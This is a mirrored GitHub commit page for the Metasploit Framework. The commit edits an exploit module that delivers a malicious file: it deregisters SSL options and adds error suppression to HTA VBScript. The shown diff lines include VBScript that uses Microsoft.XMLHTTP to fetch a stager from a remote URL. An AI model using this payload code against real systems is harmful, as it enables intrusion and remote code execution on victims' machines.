mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-05 14:57:30 +01:00
deregistered SSL, added the HTA dodgy try/catch feature
This commit is contained in:
parent
17b28388e9
commit
b099196172
@ -51,6 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
deregister_options('SSL', 'SSLVersion', 'SSLCert')
|
||||
end
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
@ -79,6 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
</script>
|
||||
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
|
||||
<script language="VBScript">
|
||||
On Error Resume Next
|
||||
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
|
||||
#{name_xmlhttp}.open "GET","http://#{url}",False
|
||||
#{name_xmlhttp}.send
|
||||
|
Loading…
Reference in New Issue
Block a user